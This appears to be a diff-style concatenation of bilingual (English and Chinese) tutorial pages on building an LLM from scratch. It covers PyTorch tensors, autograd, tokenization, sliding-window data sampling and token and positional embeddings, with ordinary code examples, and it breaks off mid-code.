"emb_dim": 768,       // Embedding dimension
"n_heads": 12,        // Number of attention heads
"n_layers": 12,       // Number of layers
"drop_rate": 0.1,     // Dropout rate: 10%
"qkv_bias": False     // Query-Key-Value bias
}
```

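As a rough sanity check (my own approximation, not from the original text), the parameter count implied by this config can be estimated in a few lines:
```python
# Rough parameter-count estimate for the config above (biases and LayerNorms ignored)
cfg = {"vocab_size": 50257, "context_length": 1024, "emb_dim": 768, "n_layers": 12}

emb = cfg["vocab_size"] * cfg["emb_dim"] + cfg["context_length"] * cfg["emb_dim"]
per_layer = 12 * cfg["emb_dim"] ** 2   # attention QKV+proj (4·d²) + MLP (8·d²)
total = emb + cfg["n_layers"] * per_layer
print(f"~{total / 1e6:.0f}M parameters")  # ≈ 124M, matching GPT_CONFIG_124M
```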
## Tensors in PyTorch

In PyTorch, a **tensor** is a fundamental data structure that serves as a multi-dimensional array, generalizing concepts like scalars, vectors, and matrices to potentially higher dimensions. Tensors are the primary way data is represented and manipulated in PyTorch, especially in the context of deep learning and neural networks.

### Mathematical Concept of Tensors

- **Scalars**: Tensors of rank 0, representing a single number (zero-dimensional). Like: 5
- **Vectors**: Tensors of rank 1, representing a one-dimensional array of numbers. Like: \[5,1]
- **Matrices**: Tensors of rank 2, representing two-dimensional arrays with rows and columns. Like: \[\[1,3], \[5,2]]
- **Higher-Rank Tensors**: Tensors of rank 3 or more, representing data in higher dimensions (e.g., 3D tensors for color images).

### Tensors as Data Containers

From a computational perspective, tensors act as containers for multi-dimensional data, where each dimension can represent different features or aspects of the data. This makes tensors highly suitable for handling complex datasets in machine learning tasks.

### PyTorch Tensors vs. NumPy Arrays

While PyTorch tensors are similar to NumPy arrays in their ability to store and manipulate numerical data, they offer additional functionalities crucial for deep learning:

- **Automatic Differentiation**: PyTorch tensors support automatic calculation of gradients (autograd), which simplifies the process of computing derivatives required for training neural networks.
- **GPU Acceleration**: Tensors in PyTorch can be moved to and computed on GPUs, significantly speeding up large-scale computations.

### Creating Tensors in PyTorch

You can create tensors using the `torch.tensor` function:
```python
import torch

# Scalar (0D tensor)
tensor0d = torch.tensor(1)

# Vector (1D tensor)
tensor1d = torch.tensor([1, 2, 3])

# Matrix (2D tensor)
tensor2d = torch.tensor([[1, 2],
                         [3, 4]])

# 3D Tensor
tensor3d = torch.tensor([[[1, 2], [3, 4]],
                         [[5, 6], [7, 8]]])
```

### Tensor Data Types

PyTorch tensors can store data of various types, such as integers and floating-point numbers.

You can check a tensor's data type using the `.dtype` attribute:
```python
tensor1d = torch.tensor([1, 2, 3])
print(tensor1d.dtype)  # Output: torch.int64
```
- Tensors created from Python integers are of type `torch.int64`.
- Tensors created from Python floats are of type `torch.float32`.

To change a tensor's data type, use the `.to()` method:
```python
float_tensor = tensor1d.to(torch.float32)
print(float_tensor.dtype)  # Output: torch.float32
```

### Common Tensor Operations

PyTorch provides a variety of operations to manipulate tensors:

- **Accessing Shape**: Use `.shape` to get the dimensions of a tensor.

```python
print(tensor2d.shape)  # Output: torch.Size([2, 2])
```

- **Reshaping Tensors**: Use `.reshape()` or `.view()` to change the shape.

```python
reshaped = tensor2d.reshape(4, 1)
```

- **Transposing Tensors**: Use `.T` to transpose a 2D tensor.

```python
transposed = tensor2d.T
```

- **Matrix Multiplication**: Use `.matmul()` or the `@` operator.

```python
result = tensor2d @ tensor2d.T
```

### Importance in Deep Learning

Tensors are essential in PyTorch for building and training neural networks:

- They store input data, weights, and biases.
- They facilitate the operations required for forward and backward passes in training algorithms.
- With autograd, tensors enable automatic computation of gradients, streamlining the optimization process.

## Automatic Differentiation

Automatic differentiation (AD) is a computational technique used to **evaluate the derivatives (gradients) of functions efficiently and accurately**. In the context of neural networks, AD enables the calculation of gradients required for **optimization algorithms like gradient descent**. PyTorch provides an automatic differentiation engine called **autograd** that simplifies this process.

### Mathematical Explanation of Automatic Differentiation

**1. The Chain Rule**

At the heart of automatic differentiation is the **chain rule** from calculus. The chain rule states that if you have a composition of functions, the derivative of the composite function is the product of the derivatives of the composed functions.

Mathematically, if `y = f(u)` and `u = g(x)`, then the derivative of `y` with respect to `x` is:

<figure><img src="../../images/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

**2. Computational Graph**

In AD, computations are represented as nodes in a **computational graph**, where each node corresponds to an operation or a variable. By traversing this graph, we can compute derivatives efficiently.

**3. Example**

Let's consider a simple function:

<figure><img src="../../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Where:

- `σ(z)` is the sigmoid function.
- `y=1.0` is the target label.
- `L` is the loss.

We want to compute the gradients of the loss `L` with respect to the weight `w` and the bias `b`.

**4. Computing Gradients Manually**

<figure><img src="../../images/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>

**5. Numerical Calculation**

<figure><img src="../../images/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>

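To make the numbers in those figures concrete, here is a small numeric check of the same gradients (assuming the values used in the PyTorch example below: `x=1.1`, `w=2.2`, `b=0.0`, `y=1.0`):
```python
import math

x, w, b, y = 1.1, 2.2, 0.0, 1.0
z = x * w + b
a = 1 / (1 + math.exp(-z))   # sigmoid(z)

# For sigmoid + binary cross-entropy, dL/dz simplifies to (a - y);
# the chain rule then goes through z = x*w + b
dL_dz = a - y
print("dL/dw:", dL_dz * x)   # ≈ -0.0898
print("dL/db:", dL_dz * 1)   # ≈ -0.0817
```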
### Implementing Automatic Differentiation in PyTorch

Now, let's see how PyTorch automates this process.
```python
import torch
import torch.nn.functional as F

# Define input and target
x = torch.tensor([1.1])
y = torch.tensor([1.0])

# Initialize weights with requires_grad=True to track computations
w = torch.tensor([2.2], requires_grad=True)
b = torch.tensor([0.0], requires_grad=True)

# Forward pass
z = x * w + b
a = torch.sigmoid(z)
loss = F.binary_cross_entropy(a, y)

# Backward pass
loss.backward()

# Gradients
print("Gradient w.r.t w:", w.grad)
print("Gradient w.r.t b:", b.grad)
```

Running this prints:
```
Gradient w.r.t w: tensor([-0.0898])
Gradient w.r.t b: tensor([-0.0817])
```

## Backpropagation in Bigger Neural Networks

### **1. Extending to Multilayer Networks**

In larger neural networks with multiple layers, the process of computing gradients becomes more complex due to the increased number of parameters and operations. However, the fundamental principles remain the same:

- **Forward Pass:** Compute the output of the network by passing inputs through each layer.
- **Compute Loss:** Evaluate the loss function using the network's output and the target labels.
- **Backward Pass (Backpropagation):** Compute the gradients of the loss with respect to each parameter in the network by applying the chain rule recursively from the output layer back to the input layer.

### **2. Backpropagation Algorithm**

- **Step 1:** Initialize the network parameters (weights and biases).
- **Step 2:** For each training example, perform a forward pass to compute the outputs.
- **Step 3:** Compute the loss.
- **Step 4:** Compute the gradients of the loss with respect to each parameter using the chain rule.
- **Step 5:** Update the parameters using an optimization algorithm (e.g., gradient descent).

### **3. Mathematical Representation**

Consider a simple neural network with one hidden layer:

<figure><img src="../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>

### **4. PyTorch Implementation**

PyTorch simplifies this process with its autograd engine.
```python
import torch
import torch.nn as nn
import torch.optim as optim

# Define a simple neural network
class SimpleNet(nn.Module):
    def __init__(self):
        super(SimpleNet, self).__init__()
        self.fc1 = nn.Linear(10, 5)  # Input layer to hidden layer
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(5, 1)   # Hidden layer to output layer
        self.sigmoid = nn.Sigmoid()

    def forward(self, x):
        h = self.relu(self.fc1(x))
        y_hat = self.sigmoid(self.fc2(h))
        return y_hat

# Instantiate the network
net = SimpleNet()

# Define loss function and optimizer
criterion = nn.BCELoss()
optimizer = optim.SGD(net.parameters(), lr=0.01)

# Sample data
inputs = torch.randn(1, 10)
labels = torch.tensor([[1.0]])  # shape (1, 1) to match the network's output

# Training loop
optimizer.zero_grad()  # Clear gradients
outputs = net(inputs)  # Forward pass
loss = criterion(outputs, labels)  # Compute loss
loss.backward()  # Backward pass (compute gradients)
optimizer.step()  # Update parameters

# Accessing gradients
for name, param in net.named_parameters():
    if param.requires_grad:
        print(f"Gradient of {name}: {param.grad}")
```

In this code:

- **Forward Pass:** Computes the output of the network.
- **Backward Pass:** `loss.backward()` computes the gradients of the loss with respect to all parameters.
- **Parameter Update:** `optimizer.step()` updates the parameters based on the computed gradients.

### **5. Understanding the Backward Pass**

During the backward pass:

- PyTorch traverses the computational graph in reverse order.
- For each operation, it applies the chain rule to compute gradients.
- Gradients are accumulated in the `.grad` attribute of each parameter tensor.

### **6. Advantages of Automatic Differentiation**

- **Efficiency:** Avoids redundant calculations by reusing intermediate results.
- **Accuracy:** Provides exact derivatives up to machine precision.
- **Ease of Use:** Eliminates manual computation of derivatives.

@@ -1,95 +0,0 @@

# 1. Tokenizing

## Tokenizing

**Tokenizing** is the process of breaking down data, such as text, into smaller, manageable pieces called _tokens_. Each token is then assigned a unique numerical identifier (ID). This is a fundamental step in preparing text for processing by machine learning models, especially in natural language processing (NLP).

> [!TIP]
> The goal of this initial phase is very simple: **Divide the input into tokens (ids) in some way that makes sense**.

### **How Tokenizing Works**

1. **Splitting the Text:**
- **Basic Tokenizer:** A simple tokenizer might split text into individual words and punctuation marks, removing spaces.
- _Example:_\
Text: `"Hello, world!"`\
Tokens: `["Hello", ",", "world", "!"]`
2. **Creating a Vocabulary:**
- To convert tokens into numerical IDs, a **vocabulary** is created. This vocabulary lists all unique tokens (words and symbols) and assigns each a specific ID.
- **Special Tokens:** These are special symbols added to the vocabulary to handle various scenarios:
- `[BOS]` (Beginning of Sequence): Indicates the start of a text.
- `[EOS]` (End of Sequence): Indicates the end of a text.
- `[PAD]` (Padding): Used to make all sequences in a batch the same length.
- `[UNK]` (Unknown): Represents tokens that are not in the vocabulary.
- _Example:_\
If `"Hello"` is assigned ID `64`, `","` is `455`, `"world"` is `78`, and `"!"` is `467`, then:\
`"Hello, world!"` → `[64, 455, 78, 467]`
- **Handling Unknown Words:**\
If a word like `"Bye"` isn't in the vocabulary, it is replaced with `[UNK]`.\
`"Bye, world!"` → `["[UNK]", ",", "world", "!"]` → `[987, 455, 78, 467]`\
_(Assuming `[UNK]` has ID `987`)_

### **Advanced Tokenizing Methods**

While the basic tokenizer works well for simple texts, it has limitations, particularly with large vocabularies and handling new or rare words. Advanced tokenizing methods address these issues by breaking text into smaller subunits or optimizing the tokenization process.

1. **Byte Pair Encoding (BPE):**
- **Purpose:** Reduces the size of the vocabulary and handles rare or unknown words by breaking them down into frequently occurring byte pairs.
- **How It Works:**
- Starts with individual characters as tokens.
- Iteratively merges the most frequent pairs of tokens into a single token.
- Continues until no more frequent pairs can be merged.
- **Benefits:**
- Eliminates the need for an `[UNK]` token, since all words can be represented by combining existing subword tokens.
- More efficient and flexible vocabulary.
- _Example:_\
`"playing"` might be tokenized as `["play", "ing"]` if `"play"` and `"ing"` are frequent subwords.
2. **WordPiece:**
- **Used By:** Models like BERT.
- **Purpose:** Similar to BPE, it breaks down words into subword units to handle unknown words and reduce vocabulary size.
- **How It Works:**
- Begins with a base vocabulary of individual characters.
- Iteratively adds the most frequent subword that maximizes the likelihood of the training data.
- Uses a probabilistic model to decide which subwords to merge.
- **Benefits:**
- Balances between having a manageable vocabulary size and effectively representing words.
- Efficiently handles rare and compound words.
- _Example:_\
`"unhappiness"` might be tokenized as `["un", "happiness"]` or `["un", "happy", "ness"]` depending on the vocabulary.
3. **Unigram Language Model:**
- **Used By:** Models like SentencePiece.
- **Purpose:** Uses a probabilistic model to determine the most likely set of subword tokens.
- **How It Works:**
- Starts with a large set of potential tokens.
- Iteratively removes tokens whose removal least improves the model's likelihood on the training data.
- Finalizes a vocabulary where each word is represented by the most probable subword units.
- **Benefits:**
- Flexible and can model language more naturally.
- Often results in more efficient and compact tokenizations.
- _Example:_\
`"internationalization"` can be tokenized into smaller, meaningful subwords like `["international", "ization"]`.

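As a toy illustration of the BPE merge step described above (my own sketch, not a real tokenizer), counting the most frequent adjacent pair is the core operation:
```python
from collections import Counter

# One BPE merge step: count adjacent symbol pairs across a tiny "corpus"
words = ["low", "lower", "lowest"]
pairs = Counter()
for w in words:
    for a, b in zip(w, w[1:]):
        pairs[(a, b)] += 1
print(pairs.most_common(1))  # e.g. [(('l', 'o'), 3)] -> merge 'l'+'o' into 'lo'
```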
## Code Example

Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
```python
# Download a text to pre-train the model
import urllib.request
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
file_path = "the-verdict.txt"
urllib.request.urlretrieve(url, file_path)

with open("the-verdict.txt", "r", encoding="utf-8") as f:
    raw_text = f.read()

# Tokenize the text using the GPT2 tokenizer version
import tiktoken
# Note: fixed from the original, which encoded an undefined "txt" variable and allowed
# "[EOS]", which is not a gpt2 special token; gpt2 uses "<|endoftext|>"
token_ids = tiktoken.get_encoding("gpt2").encode(raw_text, allowed_special={"<|endoftext|>"})

# Print first 50 tokens
print(token_ids[:50])
#[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11]
```
## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@@ -1,240 +0,0 @@

# 2. Data Sampling

## **Data Sampling**

**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies.

> [!TIP]
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**

### **Why Data Sampling Matters**

LLMs such as GPT are trained to generate or predict text by understanding the context provided by previous words. To achieve this, the training data must be structured in a way that the model can learn the relationship between sequences of words and their subsequent words. This structured approach allows the model to generalize and generate coherent and contextually relevant text.

### **Key Concepts in Data Sampling**

1. **Tokenization:** Breaking down text into smaller units called tokens (e.g., words, subwords, or characters).
2. **Sequence Length (max_length):** The number of tokens in each input sequence.
3. **Sliding Window:** A method to create overlapping input sequences by moving a window over the tokenized text.
4. **Stride:** The number of tokens the sliding window moves forward to create the next sequence.

### **Step-by-Step Example**

Let's walk through an example to illustrate data sampling.

**Example Text**

```
"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
```

**Tokenization**

Assume we use a **basic tokenizer** that splits the text into words and punctuation marks:

```
Tokens: ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."]
```

**Parameters**

- **Max Sequence Length (max_length):** 4 tokens
- **Sliding Window Stride:** 1 token

**Creating Input and Target Sequences**

1. **Sliding Window Approach:**
- **Input Sequences:** Each input sequence consists of `max_length` tokens.
- **Target Sequences:** Each target sequence consists of the tokens that immediately follow the corresponding input sequence.
2. **Generating Sequences:**

<table><thead><tr><th width="177">Window Position</th><th>Input Sequence</th><th>Target Sequence</th></tr></thead><tbody><tr><td>1</td><td>["Lorem", "ipsum", "dolor", "sit"]</td><td>["ipsum", "dolor", "sit", "amet,"]</td></tr><tr><td>2</td><td>["ipsum", "dolor", "sit", "amet,"]</td><td>["dolor", "sit", "amet,", "consectetur"]</td></tr><tr><td>3</td><td>["dolor", "sit", "amet,", "consectetur"]</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td></tr><tr><td>4</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td><td>["amet,", "consectetur", "adipiscing", "elit."]</td></tr></tbody></table>

3. **Resulting Input and Target Arrays:**

- **Input:**

```python
[
["Lorem", "ipsum", "dolor", "sit"],
["ipsum", "dolor", "sit", "amet,"],
["dolor", "sit", "amet,", "consectetur"],
["sit", "amet,", "consectetur", "adipiscing"],
]
```

- **Target:**

```python
[
["ipsum", "dolor", "sit", "amet,"],
["dolor", "sit", "amet,", "consectetur"],
["sit", "amet,", "consectetur", "adipiscing"],
["amet,", "consectetur", "adipiscing", "elit."],
]
```

**Visual Representation**

<table><thead><tr><th width="222">Token Position</th><th>Token</th></tr></thead><tbody><tr><td>1</td><td>Lorem</td></tr><tr><td>2</td><td>ipsum</td></tr><tr><td>3</td><td>dolor</td></tr><tr><td>4</td><td>sit</td></tr><tr><td>5</td><td>amet,</td></tr><tr><td>6</td><td>consectetur</td></tr><tr><td>7</td><td>adipiscing</td></tr><tr><td>8</td><td>elit.</td></tr></tbody></table>

**Sliding Window with Stride 1:**

- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
- **Second Window (Positions 2-5):** \["ipsum", "dolor", "sit", "amet,"] → **Target:** \["dolor", "sit", "amet,", "consectetur"]
- **Third Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
- **Fourth Window (Positions 4-7):** \["sit", "amet,", "consectetur", "adipiscing"] → **Target:** \["amet,", "consectetur", "adipiscing", "elit."]

**Understanding Stride**

- **Stride of 1:** The window moves forward by one token each time, resulting in highly overlapping sequences. This can lead to better learning of contextual relationships but may increase the risk of overfitting since similar data points are repeated.
- **Stride of 2:** The window moves forward by two tokens each time, reducing overlap. This decreases redundancy and computational load but might miss some contextual nuances.
- **Stride Equal to max_length:** The window moves forward by the entire window size, resulting in non-overlapping sequences. This minimizes data redundancy but may limit the model's ability to learn dependencies across sequences.

**Example with Stride of 2:**

Using the same tokenized text and `max_length` of 4:

- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
- **Second Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
- **Third Window (Positions 5-8):** \["amet,", "consectetur", "adipiscing", "elit."] → **Target:** \["consectetur", "adipiscing", "elit.", "sed"] _(Assuming continuation)_

## Code Example

Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):

```python
# Download the text to pre-train the LLM
import urllib.request
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
file_path = "the-verdict.txt"
urllib.request.urlretrieve(url, file_path)

with open("the-verdict.txt", "r", encoding="utf-8") as f:
    raw_text = f.read()

"""
Create a class that will receive some params like tokenizer and text
and will prepare the input chunks and the target chunks to prepare
the LLM to learn which next token to generate
"""
import torch
from torch.utils.data import Dataset, DataLoader

class GPTDatasetV1(Dataset):
    def __init__(self, txt, tokenizer, max_length, stride):
        self.input_ids = []
        self.target_ids = []

        # Tokenize the entire text
        token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})

        # Use a sliding window to chunk the book into overlapping sequences of max_length
        for i in range(0, len(token_ids) - max_length, stride):
            input_chunk = token_ids[i:i + max_length]
            target_chunk = token_ids[i + 1: i + max_length + 1]
            self.input_ids.append(torch.tensor(input_chunk))
            self.target_ids.append(torch.tensor(target_chunk))

    def __len__(self):
        return len(self.input_ids)

    def __getitem__(self, idx):
        return self.input_ids[idx], self.target_ids[idx]


"""
Create a data loader which given the text and some params will
prepare the inputs and targets with the previous class and
then create a torch DataLoader with the info
"""

import tiktoken

def create_dataloader_v1(txt, batch_size=4, max_length=256,
                         stride=128, shuffle=True, drop_last=True,
                         num_workers=0):

    # Initialize the tokenizer
    tokenizer = tiktoken.get_encoding("gpt2")

    # Create dataset
    dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)

    # Create dataloader
    dataloader = DataLoader(
        dataset,
        batch_size=batch_size,
        shuffle=shuffle,
        drop_last=drop_last,
        num_workers=num_workers
    )

    return dataloader


"""
Finally, create the data loader with the params we want:
- The used text for training
- batch_size: The size of each batch
- max_length: The size of each entry on each batch
- stride: The sliding window (how many tokens should the next entry advance compared to the previous one). The smaller the more overfitting; usually this equals the max_length so the same tokens aren't repeated.
- shuffle: Re-order randomly
"""
dataloader = create_dataloader_v1(
    raw_text, batch_size=8, max_length=4, stride=1, shuffle=False
)

data_iter = iter(dataloader)
first_batch = next(data_iter)
print(first_batch)

# Note the batch_size of 8, the max_length of 4 and the stride of 1
[
# Input
tensor([[   40,   367,  2885,  1464],
        [  367,  2885,  1464,  1807],
        [ 2885,  1464,  1807,  3619],
        [ 1464,  1807,  3619,   402],
        [ 1807,  3619,   402,   271],
        [ 3619,   402,   271, 10899],
        [  402,   271, 10899,  2138],
        [  271, 10899,  2138,   257]]),
# Target
tensor([[  367,  2885,  1464,  1807],
        [ 2885,  1464,  1807,  3619],
        [ 1464,  1807,  3619,   402],
        [ 1807,  3619,   402,   271],
        [ 3619,   402,   271, 10899],
        [  402,   271, 10899,  2138],
        [  271, 10899,  2138,   257],
        [10899,  2138,   257,  7026]])
]

# With stride=4 this will be the result:
[
# Input
tensor([[   40,   367,  2885,  1464],
        [ 1807,  3619,   402,   271],
        [10899,  2138,   257,  7026],
        [15632,   438,  2016,   257],
        [  922,  5891,  1576,   438],
        [  568,   340,   373,   645],
        [ 1049,  5975,   284,   502],
        [  284,  3285,   326,    11]]),
# Target
tensor([[  367,  2885,  1464,  1807],
        [ 3619,   402,   271, 10899],
        [ 2138,   257,  7026, 15632],
        [  438,  2016,   257,   922],
        [ 5891,  1576,   438,   568],
        [  340,   373,   645,  1049],
        [ 5975,   284,   502,   284],
        [ 3285,   326,    11,   287]])
]
```

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@@ -1,203 +0,0 @@

# 3. Token Embeddings

## Token Embeddings

After tokenizing text data, the next critical step in preparing data for training large language models (LLMs) like GPT is creating **token embeddings**. Token embeddings transform discrete tokens (such as words or subwords) into continuous numerical vectors that the model can process and learn from. This explanation breaks down token embeddings, their initialization, usage, and the role of positional embeddings in enhancing the model's understanding of token sequences.

> [!TIP]
> The goal of this third phase is very simple: **Assign each of the previous tokens in the vocabulary a vector of the desired dimensions to train the model.** Each word in the vocabulary gets a point in a space of X dimensions.\
> Note that initially the position of each word in the space is just initialised "randomly", and these positions are trainable parameters (they will be improved during the training).
>
> Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute position of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning).

### **What Are Token Embeddings?**

**Token embeddings** are numerical representations of tokens in a continuous vector space. Each token in the vocabulary is associated with a unique vector of fixed dimensions. These vectors capture semantic and syntactic information about the tokens, enabling the model to understand relationships and patterns in the data.

- **Vocabulary Size:** The total number of unique tokens (e.g., words, subwords) in the model's vocabulary.
- **Embedding Dimensions:** The number of numerical values (dimensions) in each token's vector. Higher dimensions can capture more nuanced information but require more computational resources.

**Example:**

- **Vocabulary Size:** 6 tokens \[1, 2, 3, 4, 5, 6]
- **Embedding Dimensions:** 3 (x, y, z)

### **Initializing Token Embeddings**

At the start of training, token embeddings are typically initialized with small random values. These initial values are adjusted (fine-tuned) during training to better represent the tokens' meanings based on the training data.

**PyTorch Example:**
```python
import torch

# Set a random seed for reproducibility
torch.manual_seed(123)

# Create an embedding layer with 6 tokens and 3 dimensions
embedding_layer = torch.nn.Embedding(6, 3)

# Display the initial weights (embeddings)
print(embedding_layer.weight)
```

**Output:**
```
Parameter containing:
tensor([[ 0.3374, -0.1778, -0.1690],
        [ 0.9178,  1.5810,  1.3010],
        [ 1.2753, -0.2010, -0.1606],
        [-0.4015,  0.9666, -1.1481],
        [-1.1589,  0.3255, -0.6315],
        [-2.8400, -0.7849, -1.4096]], requires_grad=True)
```

**Explanation:**

- Each row corresponds to a token in the vocabulary.
- Each column represents a dimension in the embedding vector.
- For example, the token at index `3` has the embedding vector `[-0.4015, 0.9666, -1.1481]`.

**Accessing a Token's Embedding:**

```python
|
||||
# Retrieve the embedding for the token at index 3
|
||||
token_index = torch.tensor([3])
|
||||
print(embedding_layer(token_index))
|
||||
```
|
||||
**输出:**
|
||||
```lua
|
||||
tensor([[-0.4015, 0.9666, -1.1481]], grad_fn=<EmbeddingBackward0>)
|
||||
```
|
||||
**解释:**
|
||||
|
||||
- 索引为 `3` 的标记由向量 `[-0.4015, 0.9666, -1.1481]` 表示。
|
||||
- 这些值是可训练的参数,模型将在训练过程中调整这些参数,以更好地表示标记的上下文和含义。
|
||||
|
||||
### **标记嵌入在训练中的工作原理**
|
||||
|
||||
在训练过程中,输入数据中的每个标记都被转换为其对应的嵌入向量。这些向量随后在模型内的各种计算中使用,例如注意力机制和神经网络层。
|
||||
|
||||
**示例场景:**
|
||||
|
||||
- **批量大小:** 8(同时处理的样本数量)
|
||||
- **最大序列长度:** 4(每个样本的标记数量)
|
||||
- **嵌入维度:** 256
|
||||
|
||||
**数据结构:**
|
||||
|
||||
- 每个批次表示为形状为 `(batch_size, max_length, embedding_dim)` 的 3D 张量。
|
||||
- 对于我们的示例,形状将是 `(8, 4, 256)`。
|
||||
|
||||
**可视化:**
|
||||
```css
|
||||
cssCopy codeBatch
|
||||
┌─────────────┐
|
||||
│ Sample 1 │
|
||||
│ ┌─────┐ │
|
||||
│ │Token│ → [x₁₁, x₁₂, ..., x₁₂₅₆]
|
||||
│ │ 1 │ │
|
||||
│ │... │ │
|
||||
│ │Token│ │
|
||||
│ │ 4 │ │
|
||||
│ └─────┘ │
|
||||
│ Sample 2 │
|
||||
│ ┌─────┐ │
|
||||
│ │Token│ → [x₂₁, x₂₂, ..., x₂₂₅₆]
|
||||
│ │ 1 │ │
|
||||
│ │... │ │
|
||||
│ │Token│ │
|
||||
│ │ 4 │ │
|
||||
│ └─────┘ │
|
||||
│ ... │
|
||||
│ Sample 8 │
|
||||
│ ┌─────┐ │
|
||||
│ │Token│ → [x₈₁, x₈₂, ..., x₈₂₅₆]
|
||||
│ │ 1 │ │
|
||||
│ │... │ │
|
||||
│ │Token│ │
|
||||
│ │ 4 │ │
|
||||
│ └─────┘ │
|
||||
└─────────────┘
|
||||
```
|
||||
**解释:**
|
||||
|
||||
- 序列中的每个令牌由一个256维的向量表示。
|
||||
- 模型处理这些嵌入以学习语言模式并生成预测。
|
||||
|
||||
## **位置嵌入:为令牌嵌入添加上下文**
|
||||
|
||||
虽然令牌嵌入捕捉了单个令牌的含义,但它们并不固有地编码令牌在序列中的位置。理解令牌的顺序对于语言理解至关重要。这就是**位置嵌入**发挥作用的地方。
|
||||
|
||||
### **为什么需要位置嵌入:**
|
||||
|
||||
- **令牌顺序很重要:** 在句子中,意义往往依赖于单词的顺序。例如,“猫坐在垫子上”与“垫子坐在猫上”。
|
||||
- **嵌入限制:** 如果没有位置信息,模型将令牌视为“词袋”,忽略它们的顺序。
|
||||
|
||||
### **位置嵌入的类型:**
|
||||
|
||||
1. **绝对位置嵌入:**
|
||||
- 为序列中的每个位置分配一个唯一的位置向量。
|
||||
- **示例:** 任何序列中的第一个令牌具有相同的位置嵌入,第二个令牌具有另一个,以此类推。
|
||||
- **使用者:** OpenAI的GPT模型。
|
||||
2. **相对位置嵌入:**
|
||||
- 编码令牌之间的相对距离,而不是它们的绝对位置。
|
||||
- **示例:** 指示两个令牌之间的距离,无论它们在序列中的绝对位置如何。
|
||||
- **使用者:** 像Transformer-XL和一些BERT变体的模型。
|
||||
|
||||
### **位置嵌入是如何集成的:**
|
||||
|
||||
- **相同维度:** 位置嵌入与令牌嵌入具有相同的维度。
|
||||
- **相加:** 它们被添加到令牌嵌入中,将令牌身份与位置信息结合,而不增加整体维度。
|
||||
|
||||
**添加位置嵌入的示例:**
|
||||
|
||||
假设一个令牌嵌入向量是`[0.5, -0.2, 0.1]`,其位置嵌入向量是`[0.1, 0.3, -0.1]`。模型使用的组合嵌入将是:
|
||||
```css
|
||||
Combined Embedding = Token Embedding + Positional Embedding
|
||||
= [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)]
|
||||
= [0.6, 0.1, 0.0]
|
||||
```
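
As a quick sanity check, the same addition can be reproduced in PyTorch (a minimal sketch using the example vectors above):
```python
import torch

token_embedding = torch.tensor([0.5, -0.2, 0.1])
positional_embedding = torch.tensor([0.1, 0.3, -0.1])

# Element-wise addition combines token identity with position information
combined = token_embedding + positional_embedding
print(combined)  # tensor([0.6000, 0.1000, 0.0000])
```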

**Benefits of Positional Embeddings:**

- **Contextual Awareness:** The model can differentiate tokens based on their positions.
- **Sequence Understanding:** Enables the model to understand grammar, syntax, and context-dependent meanings.

## Code Example

The following is a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
```python
# Use previous code...

# Create dimensional embeddings
"""
BPE uses a vocabulary of 50257 words
Let's suppose we want to use 256 dimensions (instead of the millions used by LLMs)
"""

vocab_size = 50257
output_dim = 256
token_embedding_layer = torch.nn.Embedding(vocab_size, output_dim)

## Generate the dataloader like before
max_length = 4
dataloader = create_dataloader_v1(
    raw_text, batch_size=8, max_length=max_length,
    stride=max_length, shuffle=False
)
data_iter = iter(dataloader)
inputs, targets = next(data_iter)

# Apply embeddings
token_embeddings = token_embedding_layer(inputs)
print(token_embeddings.shape)
# torch.Size([8, 4, 256]) # 8 x 4 x 256

# Generate absolute embeddings
context_length = max_length
pos_embedding_layer = torch.nn.Embedding(context_length, output_dim)

